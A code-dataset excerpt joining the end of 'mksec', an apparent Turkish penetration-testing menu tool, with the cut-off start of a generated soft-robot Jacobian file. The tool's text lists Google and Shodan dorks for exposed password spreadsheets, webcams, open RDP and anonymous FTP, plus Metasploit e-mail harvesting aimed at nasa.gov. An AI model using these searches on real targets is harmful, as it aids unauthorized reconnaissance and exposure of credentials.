dizin çıkar\ngzip [dosya] –> dosya sıkıştır ve dosya.gz olarak yeniden adlandır\ngzip -d [dosya.gz] –> dosya.gz'yi dosya olarak geri çıkar\n\x1b[33mAğ\n==\x1b[37m\nping [host] –> host'a ping at ve sonucu göster\nwhois [domain] –> domain için whois bilgisi\ndig [domain] –> domain için DNS bilgisi\ndig -x [host] –> host çözümünü ters çevir\nwget [dosya] –> dosya indir\nwget -c [dosya] –> durdurulmuş indirmeye devam\n\x1b[33mDosya İzinleri\n==============\x1b[37m\nchmod [kod] [dosya] –> dosya izinlerini değiştir. bu izinler farklı kategorilere göre değişir (kullanıcı, grup ve herkes gibi):\n• 4 = okuma (r) \n• 2 = yazma (w)\n• 1 = çalıştırma (x)\nörnekler:\nchmod 777 –> herkes için oku, yaz, çalıştır\nchmod 755 –> rwx sahibi için, rx grup ve herkes için.\ndaha fazlası için: man chmod\n\x1b[33mKurulum\n=======\x1b[37m\nKaynaktan kurulum:\n./configure\nmake\nmake install\ndpkg -i [pkg.deb] –> paket kurulumu (Debian)\nrpm -Uvh [pkg.rpm] – paket kurulumu (RPM)\n\x1b[33mSSH\n===\x1b[37m\nssh [kullanıcı@host] –> kullanıcı olarak sunucuya bağlan\nssh -p port [user@host] –> kullanıcı olarak port üzerinden sunucuya bağlan\nssh-copy-id [user@host] –> kullanıcı için anahtarı ekleyin ve anahtarla ve şifresiz olarak oturum açın\n\x1b[33mArama\n=====\x1b[37m\ngrep [pattern] [dosyalar] –> dosyalarda kalıp arayın\ngrep -r [pattern] [dir] –> dizin içinde kalıbı tekrarlayarak arayın\n[komut] | grep [pattern] –> komut çıktısında kalıp arayın\nlocate [dosya] –> dosya'nın tüm örneklerini arayın\n\x1b[33mKısayollar\n==========\x1b[37m\nCtrl+C –> şu anki komutu durdurur\nCtrl+Z –> şu anki komutu durdurur, önde fg ile veya arkada bg ile komut işlemini kaldığı yerden sürdürür\nCtrl+D –> exit gibi oturumu kapatır\nCtrl+W –> satırdaki bir kelimeyi siler\nCtrl+U –> tüm satırı siler\nCtrl+R –> son komutu öne getir\nCtrl+P –> son komutu göster\n!! -> son komutu tekrar et\nexit –> oturumdan çık\x1b[37m\n")
UserInputs(uinput+"lin")
def informationGatheringMore():
os.system("clear")
print("\x1b[1m\x1b[33mMore about Information Gathering\x1b[37m\n\x1b[32m'archive.org'\x1b[37m sitesinden, hedef sitenin gecmis ekran goruntulerini inceleyebilirsiniz.\n\n\x1b[32mwhois\x1b[37m: domainin bilgilerini icerir. domainin kayit ve suresinin bitis tarihi, host edildigi firmanin name server bilgileri de yer alir.\n\x1b[36mex: whois microsoft.com\x1b[37m\n\n\x1b[32mbing:\x1b[37m ip addr aramasi yaparak subdomain bulmak. \x1b[36mex:\x1b[37m site:168.148.56.21\n\n\x1b[32mping:\x1b[37m ping atarak ip adresini ogrenebilirsiniz \x1b[36mex:\x1b[37m google.com\n\n\x1b[32mgoogle dorks\x1b[37m\n\x1b[32m============\x1b[37m\n\x1b[37m\x1b[36msite:\x1b[37mmertkaragoz.com\n\x1b[36mfiletype:\x1b[37mpdf\n\x1b[36minurl:\x1b[37madmin\n\x1b[36mintitle:\x1b[37mlinux nedir\n\x1b[36mintext:\x1b[37mlinux isletim sistemidir\n\x1b[36mcache:\x1b[37mmertkaragoz.com\n\x1b[33mex:\x1b[37m intitle:webcam 7 inurl:8080 -intext:8080\n\x1b[33mex:\x1b[37m xls 'username | password' site:.com\n\n\x1b[32mshodan dorks\x1b[37m\n\x1b[32m============\x1b[37m\n\x1b[36mproduct:\x1b[37mngnix\n\x1b[36mcity:\x1b[37mistanbul\n\x1b[36mcountry:\x1b[37mTR\n\x1b[36mport:\x1b[37m3389\n\x1b[36mhostname:\x1b[37mgoogle.com\n\x1b[36mnet\x1b[37m:178.156.32.48\n\x1b[36mos:\x1b[37mlinux\n\x1b[32mex:\x1b[37m product:cisco country:TR\n\x1b[32mex:\x1b[37m product:nginx city:dallas country:US port:8080 os:linux\n\x1b[32mex:\x1b[37m country:TR port:3389\n\x1b[32mex:\x1b[37m country:TR port:21 'anonymous user logged in'\n\x1b[32mex:\x1b[37m country:TR port:1434\n\x1b[32mex:\x1b[37m Cisco 200 OK\n\n\x1b[36mmsfconsole\x1b[37m ile e-mail bilgileri toplamak icin konsola sirasiyla yaziniz\n\x1b[33m1)\x1b[37m msfconsole\n\x1b[33m2)\x1b[37m use auxiliary/gather/search_email_collector\n\x1b[33m3)\x1b[37m show options\n\x1b[33m4)\x1b[37m set DOMAIN nasa.gov\n\x1b[33m5)\x1b[37m run\x1b[37m\n")
while 1:
uinput = input("\x1b[1m\033[36m[mksec]\033[36m[information_gathering_more]\033[37m\x1b[0m ")
UserInputs(uinput+"information")
def about():
print("""\x1b[1m\x1b[36m©Copyright 2021 mksec\n\n\x1b[0mversion: 1.08\x1b[37m\x1b[1m\n\n\x1b[33mWritten by:\x1b[37m Mert Karagoz (generatorexit) @generatorexit\n\n\x1b[31mDISCLAIMER:\x1b[37m This is *only* for testing purposes and can only be used where strict consent has been given. Do not use this for illegal purposes, period.\nplease read the license under readme/license for the licensing of mksec.\n\n\x1b[33m[mksec Tutorial]\x1b[37m\nFor a full document on how to use mksec, [Visit the mksec user manual] (https://github.com/generatorexit/mksec/raw/master/readme/user_manual.pdf)\n\n\x1b[33m[Features]\x1b[37m\nmksec, linux icin hazirlanmis acik kaynakli bir sizma testi aracidir. mksec, sizma testi araclarini daha hizli bir sekilde kullanmanizi saglar.\nMert Karagoz tarafindan hazirlanan araclari da icerisinde bulundurur. hicbir sirketin, firmanin or hacker grubunun urunu degildir.\n\n\x1b[33m[Bugs and Enhancements]\x1b[37m\nFor bug reports or enhancements, please open an [issue]\n(https://github.com/generatorexit/mksec/issues) here.\n\n\x1b[33m[Supported Platforms]\x1b[37m\nKali Linux\n\n\x1b[33m[Install mksec]\x1b[37m\nkurulum yazilacak\n\n\x1b[33m[mksec Development Team]\x1b[37m\n@generatorexit\n\n\x1b[33m[Former Developers of mksec]\x1b[37m\n@generatorexit\n\nSpecial thanks to the following person who has contributed to mksec:\n@nidagonder\n\x1b[37m""")
while 1:
uinput = input("\x1b[1m\033[36m[mksec]\033[36m[about]\033[37m\x1b[0m ")
UserInputs(uinput+"mainmenu")
def help():
print("""\x1b[1m\x1b[36mCore Commands\x1b[37m\n\x1b[36m=============\x1b[37m\n\n\x1b[33mCommand\x1b[37m \x1b[33mDescription\x1b[37m\n\x1b[33m=======\x1b[37m \x1b[33m===========\x1b[37m\n? Help menu\nhelp Help menu\nclear Clears the screen\nabout Shows information about "mksec"\nno banner Remove Banner\nbanner Adds banners. If there is a banner it will change it\nexit Exit the console\nquit Exit the console\n\n\x1b[36mTool Commands\x1b[37m\n\x1b[36m=============\x1b[37m\n\n\x1b[33mCommand\x1b[37m \x1b[33mDescription\x1b[37m\n\x1b[33m=======\x1b[37m \x1b[33m===========\x1b[37m\ninfo Displays information about tool\noptions Displays global options for tool\nset Sets a context-specific variable to a value\nrun Runs the tool\nclear Clears the screen\nback Move back from the current context\nexit Exit the console\nquit Exit the console\n\x1b[37m""")
while 1:
uinput = input("\x1b[1m\033[36m[mksec]\033[36m[help]\033[37m\x1b[0m ")
UserInputs(uinput+"mainmenu")
#mksectools
def pythonCompiler():
import py_compile
os.system("""echo \x1b[1m'
_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_
| |
| python compiler |
| |
| .py uzantili dosyayi .pyc uzantili dosyaya cevirir |
| |
| 1 python compiler |
| |
| back go back |
| |
|-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-|'
""")
uinput = input("\n\x1b[1m\033[36m[mksec]\033[37m\x1b[0m ")
if uinput == "1":
os.system("echo 'ex: /root/Desktop/mksec.py'")
userfile = input("\x1b[1m\033[36m[mksec]\033[36m[file.location]\033[37m\x1b[0m ")
py_compile.compile(userfile)
elif uinput == "back":
os.system("clear")
mksectools()
else:
os.system("clear")
pythonCompiler()
MainMenu()
except KeyboardInterrupt:
print("\x1b[1mUse the 'exit' command to quit.")
NoBanner()
| 227.298878
| 97,439
| 0.639028
| 50,710
| 384,817
| 4.799862
| 0.070972
| 0.021126
| 0.018587
| 0.022843
| 0.81565
| 0.784919
| 0.763608
| 0.751353
| 0.733744
| 0.716086
| 0
| 0.057595
| 0.258201
| 384,817
| 1,693
| 97,440
| 227.298878
| 0.794421
| 0.001273
| 0
| 0.566227
| 0
| 0.14752
| 0.851148
| 0.213957
| 0
| 0
| 0.000021
| 0
| 0
| 1
| 0.042687
| false
| 0.035154
| 0.003766
| 0
| 0.047709
| 0.090395
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 9
|
ba97e8b89e03e002ce5ef8254e5e6db82e790541
| 139,433
|
py
|
Python
|
o/soft_robot/derivation_of_kinematics/derived/python_src/J_1.py
|
YoshimitsuMatsutaIe/ctrlab2021_soudan
|
7841c981e6804cc92d34715a00e7c3efce41d1d0
|
[
"MIT"
] | null | null | null |
o/soft_robot/derivation_of_kinematics/derived/python_src/J_1.py
|
YoshimitsuMatsutaIe/ctrlab2021_soudan
|
7841c981e6804cc92d34715a00e7c3efce41d1d0
|
[
"MIT"
] | null | null | null |
o/soft_robot/derivation_of_kinematics/derived/python_src/J_1.py
|
YoshimitsuMatsutaIe/ctrlab2021_soudan
|
7841c981e6804cc92d34715a00e7c3efce41d1d0
|
[
"MIT"
] | null | null | null |
import numpy
def f(q, xi):
return numpy.array([[-99887.2123151958*(2*q[0, 0] - q[1, 0] - q[2, 0])*(4*q[0, 0] - 2*q[1, 0] - 2*q[2, 0])*(q[0, 0] + q[1, 0] + q[2, 0] + 0.45)*(q[0, 0]**2 - q[0, 0]*q[1, 0] - q[0, 0]*q[2, 0] + q[1, 0]**2 - q[1, 0]*q[2, 0] + q[2, 0]**2) + 5073636.18108931*(2*q[0, 0] - q[1, 0] - q[2, 0])*(6*q[0, 0] - 3*q[1, 0] - 3*q[2, 0])*(q[0, 0] + q[1, 0] + q[2, 0] + 0.45)*(q[0, 0]**2 - q[0, 0]*q[1, 0] - q[0, 0]*q[2, 0] + q[1, 0]**2 - q[1, 0]*q[2, 0] + q[2, 0]**2)**2 - 160351958.315909*(2*q[0, 0] - q[1, 0] - q[2, 0])*(8*q[0, 0] - 4*q[1, 0] - 4*q[2, 0])*(q[0, 0] + q[1, 0] + q[2, 0] + 0.45)*(q[0, 0]**2 - q[0, 0]*q[1, 0] - q[0, 0]*q[2, 0] + q[1, 0]**2 - q[1, 0]*q[2, 0] + q[2, 0]**2)**3 + (2*q[0, 0] - q[1, 0] - q[2, 0])*(2106.99588477366*q[0, 0] - 1053.49794238683*q[1, 0] - 1053.49794238683*q[2, 0])*(q[0, 0] + q[1, 0] + q[2, 0] + 0.45) - 160351958.315909*(2*q[0, 0] - q[1, 0] - q[2, 0])*(q[0, 0]**2 - q[0, 0]*q[1, 0] - q[0, 0]*q[2, 0] + q[1, 0]**2 - q[1, 0]*q[2, 0] + q[2, 0]**2)**4 + 5073636.18108931*(2*q[0, 0] - q[1, 0] - q[2, 0])*(q[0, 0]**2 - q[0, 0]*q[1, 0] - q[0, 0]*q[2, 0] + q[1, 0]**2 - q[1, 0]*q[2, 0] + q[2, 0]**2)**3 - 99887.2123151958*(2*q[0, 0] - q[1, 0] - q[2, 0])*(q[0, 0]**2 - q[0, 0]*q[1, 0] - q[0, 0]*q[2, 0] + q[1, 0]**2 - q[1, 0]*q[2, 0] + q[2, 0]**2)**2 + (2106.99588477366*q[0, 0] - 1053.49794238683*q[1, 0] - 1053.49794238683*q[2, 0])*(q[0, 0]**2 - q[0, 0]*q[1, 0] - q[0, 0]*q[2, 0] + q[1, 0]**2 - q[1, 0]*q[2, 0] + q[2, 0]**2) - 320703916.631818*(q[0, 0] + q[1, 0] + q[2, 0] + 0.45)*(q[0, 0]**2 - q[0, 0]*q[1, 0] - q[0, 0]*q[2, 0] + q[1, 0]**2 - q[1, 0]*q[2, 0] + q[2, 0]**2)**4 + 10147272.3621786*(q[0, 0] + q[1, 0] + q[2, 0] + 0.45)*(q[0, 0]**2 - q[0, 0]*q[1, 0] - q[0, 0]*q[2, 0] + q[1, 0]**2 - q[1, 0]*q[2, 0] + q[2, 0]**2)**3 - 199774.424630392*(q[0, 0] + q[1, 0] + q[2, 0] + 0.45)*(q[0, 0]**2 - q[0, 0]*q[1, 0] - q[0, 0]*q[2, 0] + q[1, 0]**2 - q[1, 0]*q[2, 0] + q[2, 0]**2)**2 + (2106.99588477366*q[0, 0] + 2106.99588477366*q[1, 0] + 2106.99588477366*q[2, 0] + 948.148148148148)*(q[0, 0]**2 - q[0, 0]*q[1, 0] - q[0, 0]*q[2, 0] + q[1, 0]**2 - q[1, 0]*q[2, 0] + q[2, 0]**2) + (60131984.3684659*xi**9*(q[3, 0] + q[4, 0] + q[5, 0] + 0.45)*(q[3, 0]**2 - q[3, 0]*q[4, 0] - q[3, 0]*q[5, 0] + q[4, 0]**2 - q[4, 0]*q[5, 0] + q[5, 0]**2)**4 - 1522090.85432679*xi**7*(q[3, 0] + q[4, 0] + q[5, 0] + 0.45)*(q[3, 0]**2 - q[3, 0]*q[4, 0] - q[3, 0]*q[5, 0] + q[4, 0]**2 - q[4, 0]*q[5, 0] + q[5, 0]**2)**3 + 22474.6227709191*xi**5*(q[3, 0] + q[4, 0] + q[5, 0] + 0.45)*(q[3, 0]**2 - q[3, 0]*q[4, 0] - q[3, 0]*q[5, 0] + q[4, 0]**2 - q[4, 0]*q[5, 0] + q[5, 0]**2)**2 - 79.0123456790123*xi**3*(q[3, 0] + q[4, 0] + q[5, 0] + 0.45)*(2*q[3, 0]**2 - 2*q[3, 0]*q[4, 0] - 2*q[3, 0]*q[5, 0] + 2*q[4, 0]**2 - 2*q[4, 0]*q[5, 0] + 2*q[5, 0]**2) + (1/3)*xi*(q[3, 0] + q[4, 0] + q[5, 0] + 0.45))*((2*q[0, 0] - q[1, 0] - q[2, 0])*(25283.9506172839*q[0, 0] - 12641.975308642*q[1, 0] - 12641.975308642*q[2, 0]) - 898984.910836762*(4*q[0, 0] - 2*q[1, 0] - 2*q[2, 0])**2*(q[0, 0]**2 - q[0, 0]*q[1, 0] - q[0, 0]*q[2, 0] + q[1, 0]**2 - q[1, 0]*q[2, 0] + q[2, 0]**2) - 2405279374.73864*(4*q[0, 0] - 2*q[1, 0] - 2*q[2, 0])*(8*q[0, 0] - 4*q[1, 0] - 4*q[2, 0])*(q[0, 0]**2 - q[0, 0]*q[1, 0] - q[0, 0]*q[2, 0] + q[1, 0]**2 - q[1, 0]*q[2, 0] + q[2, 0]**2)**3 + 30441817.0865359*(6*q[0, 0] - 3*q[1, 0] - 3*q[2, 0])*(8*q[0, 0] - 4*q[1, 0] - 4*q[2, 0])*(q[0, 0]**2 - q[0, 0]*q[1, 0] - q[0, 0]*q[2, 0] + q[1, 0]**2 - q[1, 0]*q[2, 0] + q[2, 0]**2)**2 - 9621117498.95455*(q[0, 0]**2 - q[0, 0]*q[1, 0] - q[0, 0]*q[2, 0] + q[1, 0]**2 - q[1, 0]*q[2, 0] + q[2, 0]**2)**4 + 243534536.692287*(q[0, 0]**2 - q[0, 0]*q[1, 0] - q[0, 0]*q[2, 0] + q[1, 0]**2 - q[1, 0]*q[2, 0] + q[2, 0]**2)**3 - 3595939.64334705*(q[0, 0]**2 - q[0, 0]*q[1, 0] - q[0, 0]*q[2, 0] + q[1, 0]**2 - q[1, 0]*q[2, 0] + q[2, 0]**2)**2 + 25283.9506172839*q[0, 0]**2 - 25283.9506172839*q[0, 0]*q[1, 0] - 25283.9506172839*q[0, 0]*q[2, 0] + 25283.9506172839*q[1, 0]**2 - 25283.9506172839*q[1, 0]*q[2, 0] + 25283.9506172839*q[2, 0]**2 - 53.3333333333333) + (-160351958.315909*xi**10*(2*q[3, 0] - q[4, 0] - q[5, 0])*(q[3, 0] + q[4, 0] + q[5, 0] + 0.45)*(q[3, 0]**2 - q[3, 0]*q[4, 0] - q[3, 0]*q[5, 0] + q[4, 0]**2 - q[4, 0]*q[5, 0] + q[5, 0]**2)**4 + 5073636.18108931*xi**8*(2*q[3, 0] - q[4, 0] - q[5, 0])*(q[3, 0] + q[4, 0] + q[5, 0] + 0.45)*(q[3, 0]**2 - q[3, 0]*q[4, 0] - q[3, 0]*q[5, 0] + q[4, 0]**2 - q[4, 0]*q[5, 0] + q[5, 0]**2)**3 - 99887.2123151958*xi**6*(2*q[3, 0] - q[4, 0] - q[5, 0])*(q[3, 0] + q[4, 0] + q[5, 0] + 0.45)*(q[3, 0]**2 - q[3, 0]*q[4, 0] - q[3, 0]*q[5, 0] + q[4, 0]**2 - q[4, 0]*q[5, 0] + q[5, 0]**2)**2 + 1053.49794238683*xi**4*(2*q[3, 0] - q[4, 0] - q[5, 0])*(q[3, 0] + q[4, 0] + q[5, 0] + 0.45)*(q[3, 0]**2 - q[3, 0]*q[4, 0] - q[3, 0]*q[5, 0] + q[4, 0]**2 - q[4, 0]*q[5, 0] + q[5, 0]**2) - 4.44444444444444*xi**2*(2*q[3, 0] - q[4, 0] - q[5, 0])*(q[3, 0] + q[4, 0] + q[5, 0] + 0.45))*((-102625253322.182*q[0, 0] + 51312626661.0909*q[1, 0] + 51312626661.0909*q[2, 0])*(q[0, 0]**2 - q[0, 0]*q[1, 0] - q[0, 0]*q[2, 0] + q[1, 0]**2 - q[1, 0]*q[2, 0] + q[2, 0]**2)**4 + (-63927815.8817253*q[0, 0] + 31963907.9408627*q[1, 0] + 31963907.9408627*q[2, 0])*(q[0, 0]**2 - q[0, 0]*q[1, 0] - q[0, 0]*q[2, 0] + q[1, 0]**2 - q[1, 0]*q[2, 0] + q[2, 0]**2)**2 + 84279.8353909465*(2*q[0, 0] - q[1, 0] - q[2, 0])**3 - 7990976.98521566*(2*q[0, 0] - q[1, 0] - q[2, 0])**2*(4*q[0, 0] - 2*q[1, 0] - 2*q[2, 0])*(q[0, 0]**2 - q[0, 0]*q[1, 0] - q[0, 0]*q[2, 0] + q[1, 0]**2 - q[1, 0]*q[2, 0] + q[2, 0]**2) + 2004399.47894886*(2*q[0, 0] - q[1, 0] - q[2, 0])**2*(6*q[0, 0] - 3*q[1, 0] - 3*q[2, 0])*(q[0, 0]**2 - q[0, 0]*q[1, 0] - q[0, 0]*q[2, 0] + q[1, 0]**2 - q[1, 0]*q[2, 0] + q[2, 0]**2)**2 - 12828156665.2727*(2*q[0, 0] - q[1, 0] - q[2, 0])**2*(8*q[0, 0] - 4*q[1, 0] - 4*q[2, 0])*(q[0, 0]**2 - q[0, 0]*q[1, 0] - q[0, 0]*q[2, 0] + q[1, 0]**2 - q[1, 0]*q[2, 0] + q[2, 0]**2)**3 + (674238.683127572*q[0, 0] - 337119.341563786*q[1, 0] - 337119.341563786*q[2, 0])*(q[0, 0]**2 - q[0, 0]*q[1, 0] - q[0, 0]*q[2, 0] + q[1, 0]**2 - q[1, 0]*q[2, 0] + q[2, 0]**2) + (16035195.8315909*q[0, 0] - 8017597.91579545*q[1, 0] - 8017597.91579545*q[2, 0])*(q[0, 0]**2 - q[0, 0]*q[1, 0] - q[0, 0]*q[2, 0] + q[1, 0]**2 - q[1, 0]*q[2, 0] + q[2, 0]**2)**3 - 2844.44444444444*q[0, 0] + 1422.22222222222*q[1, 0] + 1422.22222222222*q[2, 0]) + (-160351958.315909*numpy.sqrt(3)*xi**10*(q[4, 0] - q[5, 0])*(q[3, 0] + q[4, 0] + q[5, 0] + 0.45)*(q[3, 0]**2 - q[3, 0]*q[4, 0] - q[3, 0]*q[5, 0] + q[4, 0]**2 - q[4, 0]*q[5, 0] + q[5, 0]**2)**4 + 5073636.18108931*numpy.sqrt(3)*xi**8*(q[4, 0] - q[5, 0])*(q[3, 0] + q[4, 0] + q[5, 0] + 0.45)*(q[3, 0]**2 - q[3, 0]*q[4, 0] - q[3, 0]*q[5, 0] + q[4, 0]**2 - q[4, 0]*q[5, 0] + q[5, 0]**2)**3 - 99887.2123151958*numpy.sqrt(3)*xi**6*(q[4, 0] - q[5, 0])*(q[3, 0] + q[4, 0] + q[5, 0] + 0.45)*(q[3, 0]**2 - q[3, 0]*q[4, 0] - q[3, 0]*q[5, 0] + q[4, 0]**2 - q[4, 0]*q[5, 0] + q[5, 0]**2)**2 + 1053.49794238683*numpy.sqrt(3)*xi**4*(2*q[3, 0] - q[4, 0] - q[5, 0])*(q[3, 0] + q[4, 0] + q[5, 0] + 0.45)*(q[3, 0]**2 - q[3, 0]*q[4, 0] - q[3, 0]*q[5, 0] + q[4, 0]**2 - q[4, 0]*q[5, 0] + q[5, 0]**2) - 4.44444444444444*numpy.sqrt(3)*xi**2*(q[4, 0] - q[5, 0])*(q[3, 0] + q[4, 0] + q[5, 0] + 0.45))*(84279.8353909465*numpy.sqrt(3)*(q[1, 0] - q[2, 0])*(2*q[0, 0] - q[1, 0] - q[2, 0])**2 - 7990976.98521566*numpy.sqrt(3)*(q[1, 0] - q[2, 0])*(2*q[0, 0] - q[1, 0] - q[2, 0])*(4*q[0, 0] - 2*q[1, 0] - 2*q[2, 0])*(q[0, 0]**2 - q[0, 0]*q[1, 0] - q[0, 0]*q[2, 0] + q[1, 0]**2 - q[1, 0]*q[2, 0] + q[2, 0]**2) + 405890894.487145*numpy.sqrt(3)*(q[1, 0] - q[2, 0])*(2*q[0, 0] - q[1, 0] - q[2, 0])*(6*q[0, 0] - 3*q[1, 0] - 3*q[2, 0])*(q[0, 0]**2 - q[0, 0]*q[1, 0] - q[0, 0]*q[2, 0] + q[1, 0]**2 - q[1, 0]*q[2, 0] + q[2, 0]**2)**2 + 12828156665.2727*numpy.sqrt(3)*(q[1, 0] - q[2, 0])*(2*q[0, 0] - q[1, 0] - q[2, 0])*(8*q[0, 0] - 4*q[1, 0] - 4*q[2, 0])*(q[0, 0]**2 - q[0, 0]*q[1, 0] - q[0, 0]*q[2, 0] + q[1, 0]**2 - q[1, 0]*q[2, 0] + q[2, 0]**2)**3 + 25656313330.5455*numpy.sqrt(3)*(q[1, 0] - q[2, 0])*(q[0, 0]**2 - q[0, 0]*q[1, 0] - q[0, 0]*q[2, 0] + q[1, 0]**2 - q[1, 0]*q[2, 0] + q[2, 0]**2)**4 + 811781788.97429*numpy.sqrt(3)*(q[1, 0] - q[2, 0])*(q[0, 0]**2 - q[0, 0]*q[1, 0] - q[0, 0]*q[2, 0] + q[1, 0]**2 - q[1, 0]*q[2, 0] + q[2, 0]**2)**3 - 15981953.9704313*numpy.sqrt(3)*(q[1, 0] - q[2, 0])*(q[0, 0]**2 - q[0, 0]*q[1, 0] - q[0, 0]*q[2, 0] + q[1, 0]**2 - q[1, 0]*q[2, 0] + q[2, 0]**2)**2 + 168559.670781893*numpy.sqrt(3)*(q[1, 0] - q[2, 0])*(q[0, 0]**2 - q[0, 0]*q[1, 0] - q[0, 0]*q[2, 0] + q[1, 0]**2 - q[1, 0]*q[2, 0] + q[2, 0]**2) - 711.111111111111*numpy.sqrt(3)*(q[1, 0] - q[2, 0])) - 17.7777777777778*q[0, 0] - 4.44444444444444*q[1, 0] - 4.44444444444444*q[2, 0] - 4.0, -160351958.315909*(-4*q[0, 0] + 8*q[1, 0] - 4*q[2, 0])*(2*q[0, 0] - q[1, 0] - q[2, 0])*(q[0, 0] + q[1, 0] + q[2, 0] + 0.45)*(q[0, 0]**2 - q[0, 0]*q[1, 0] - q[0, 0]*q[2, 0] + q[1, 0]**2 - q[1, 0]*q[2, 0] + q[2, 0]**2)**3 + 5073636.18108931*(-3*q[0, 0] + 6*q[1, 0] - 3*q[2, 0])*(2*q[0, 0] - q[1, 0] - q[2, 0])*(q[0, 0] + q[1, 0] + q[2, 0] + 0.45)*(q[0, 0]**2 - q[0, 0]*q[1, 0] - q[0, 0]*q[2, 0] + q[1, 0]**2 - q[1, 0]*q[2, 0] + q[2, 0]**2)**2 - 99887.2123151958*(-2*q[0, 0] + 4*q[1, 0] - 2*q[2, 0])*(2*q[0, 0] - q[1, 0] - q[2, 0])*(q[0, 0] + q[1, 0] + q[2, 0] + 0.45)*(q[0, 0]**2 - q[0, 0]*q[1, 0] - q[0, 0]*q[2, 0] + q[1, 0]**2 - q[1, 0]*q[2, 0] + q[2, 0]**2) + (-q[0, 0] + 2*q[1, 0] - q[2, 0])*(2106.99588477366*q[0, 0] - 1053.49794238683*q[1, 0] - 1053.49794238683*q[2, 0])*(q[0, 0] + q[1, 0] + q[2, 0] + 0.45) - 160351958.315909*(2*q[0, 0] - q[1, 0] - q[2, 0])*(q[0, 0]**2 - q[0, 0]*q[1, 0] - q[0, 0]*q[2, 0] + q[1, 0]**2 - q[1, 0]*q[2, 0] + q[2, 0]**2)**4 + 5073636.18108931*(2*q[0, 0] - q[1, 0] - q[2, 0])*(q[0, 0]**2 - q[0, 0]*q[1, 0] - q[0, 0]*q[2, 0] + q[1, 0]**2 - q[1, 0]*q[2, 0] + q[2, 0]**2)**3 - 99887.2123151958*(2*q[0, 0] - q[1, 0] - q[2, 0])*(q[0, 0]**2 - q[0, 0]*q[1, 0] - q[0, 0]*q[2, 0] + q[1, 0]**2 - q[1, 0]*q[2, 0] + q[2, 0]**2)**2 + (2106.99588477366*q[0, 0] - 1053.49794238683*q[1, 0] - 1053.49794238683*q[2, 0])*(q[0, 0]**2 - q[0, 0]*q[1, 0] - q[0, 0]*q[2, 0] + q[1, 0]**2 - q[1, 0]*q[2, 0] + q[2, 0]**2) + (-1053.49794238683*q[0, 0] - 1053.49794238683*q[1, 0] - 1053.49794238683*q[2, 0] - 474.074074074074)*(q[0, 0]**2 - q[0, 0]*q[1, 0] - q[0, 0]*q[2, 0] + q[1, 0]**2 - q[1, 0]*q[2, 0] + q[2, 0]**2) + 160351958.315909*(q[0, 0] + q[1, 0] + q[2, 0] + 0.45)*(q[0, 0]**2 - q[0, 0]*q[1, 0] - q[0, 0]*q[2, 0] + q[1, 0]**2 - q[1, 0]*q[2, 0] + q[2, 0]**2)**4 - 5073636.18108931*(q[0, 0] + q[1, 0] + q[2, 0] + 0.45)*(q[0, 0]**2 - q[0, 0]*q[1, 0] - q[0, 0]*q[2, 0] + q[1, 0]**2 - q[1, 0]*q[2, 0] + q[2, 0]**2)**3 + 99887.2123151958*(q[0, 0] + q[1, 0] + q[2, 0] + 0.45)*(q[0, 0]**2 - q[0, 0]*q[1, 0] - q[0, 0]*q[2, 0] + q[1, 0]**2 - q[1, 0]*q[2, 0] + q[2, 0]**2)**2 + (60131984.3684659*xi**9*(q[3, 0] + q[4, 0] + q[5, 0] + 0.45)*(q[3, 0]**2 - q[3, 0]*q[4, 0] - q[3, 0]*q[5, 0] + q[4, 0]**2 - q[4, 0]*q[5, 0] + q[5, 0]**2)**4 - 1522090.85432679*xi**7*(q[3, 0] + q[4, 0] + q[5, 0] + 0.45)*(q[3, 0]**2 - q[3, 0]*q[4, 0] - q[3, 0]*q[5, 0] + q[4, 0]**2 - q[4, 0]*q[5, 0] + q[5, 0]**2)**3 + 22474.6227709191*xi**5*(q[3, 0] + q[4, 0] + q[5, 0] + 0.45)*(q[3, 0]**2 - q[3, 0]*q[4, 0] - q[3, 0]*q[5, 0] + q[4, 0]**2 - q[4, 0]*q[5, 0] + q[5, 0]**2)**2 - 79.0123456790123*xi**3*(q[3, 0] + q[4, 0] + q[5, 0] + 0.45)*(2*q[3, 0]**2 - 2*q[3, 0]*q[4, 0] - 2*q[3, 0]*q[5, 0] + 2*q[4, 0]**2 - 2*q[4, 0]*q[5, 0] + 2*q[5, 0]**2) + (1/3)*xi*(q[3, 0] + q[4, 0] + q[5, 0] + 0.45))*(-2405279374.73864*(-4*q[0, 0] + 8*q[1, 0] - 4*q[2, 0])*(4*q[0, 0] - 2*q[1, 0] - 2*q[2, 0])*(q[0, 0]**2 - q[0, 0]*q[1, 0] - q[0, 0]*q[2, 0] + q[1, 0]**2 - q[1, 0]*q[2, 0] + q[2, 0]**2)**3 + 30441817.0865359*(-3*q[0, 0] + 6*q[1, 0] - 3*q[2, 0])*(8*q[0, 0] - 4*q[1, 0] - 4*q[2, 0])*(q[0, 0]**2 - q[0, 0]*q[1, 0] - q[0, 0]*q[2, 0] + q[1, 0]**2 - q[1, 0]*q[2, 0] + q[2, 0]**2)**2 - 898984.910836762*(-2*q[0, 0] + 4*q[1, 0] - 2*q[2, 0])*(4*q[0, 0] - 2*q[1, 0] - 2*q[2, 0])*(q[0, 0]**2 - q[0, 0]*q[1, 0] - q[0, 0]*q[2, 0] + q[1, 0]**2 - q[1, 0]*q[2, 0] + q[2, 0]**2) + (-q[0, 0] + 2*q[1, 0] - q[2, 0])*(25283.9506172839*q[0, 0] - 12641.975308642*q[1, 0] - 12641.975308642*q[2, 0]) + 4810558749.47727*(q[0, 0]**2 - q[0, 0]*q[1, 0] - q[0, 0]*q[2, 0] + q[1, 0]**2 - q[1, 0]*q[2, 0] + q[2, 0]**2)**4 - 121767268.346143*(q[0, 0]**2 - q[0, 0]*q[1, 0] - q[0, 0]*q[2, 0] + q[1, 0]**2 - q[1, 0]*q[2, 0] + q[2, 0]**2)**3 + 1797969.82167352*(q[0, 0]**2 - q[0, 0]*q[1, 0] - q[0, 0]*q[2, 0] + q[1, 0]**2 - q[1, 0]*q[2, 0] + q[2, 0]**2)**2 - 12641.975308642*q[0, 0]**2 + 12641.975308642*q[0, 0]*q[1, 0] + 12641.975308642*q[0, 0]*q[2, 